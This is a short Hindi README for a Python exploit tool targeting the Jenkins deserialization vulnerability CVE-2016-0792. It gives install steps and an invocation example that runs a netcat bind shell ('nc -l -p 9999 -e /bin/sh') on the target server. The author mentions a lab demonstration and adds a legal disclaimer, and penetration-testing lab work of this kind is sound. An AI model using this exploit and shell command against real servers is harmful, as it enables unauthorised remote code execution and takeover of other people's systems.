
जेनकिंस सीरियलाइज़ेशन कमजोरी के लिए शोषण - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
पायथन 3.6.x
requests लाइब्रेरी इस एक्सप्लॉइट के लिए आवश्यक है
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
जहाँ url जेनकिंस सर्वर का url है और command वह कमांड है जिसे निष्पादित करना है
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
यह कमजोर मशीन पर nc चलाएगा और पोर्ट 9999 पर सुनेगा
प्रदर्शन उद्देश्यों के लिए मैं पेंटेस्टर लैब से ISO चलाऊंगा
बिना अनुमति के लक्ष्यों पर हमला करने के लिए इस सॉफ्टवेयर का उपयोग करना गैरकानूनी है। इस सॉफ्टवेयर का कानून के विरुद्ध उपयोग करने से हुए किसी भी नुकसान के लिए मैं जिम्मेदार नहीं हूँ।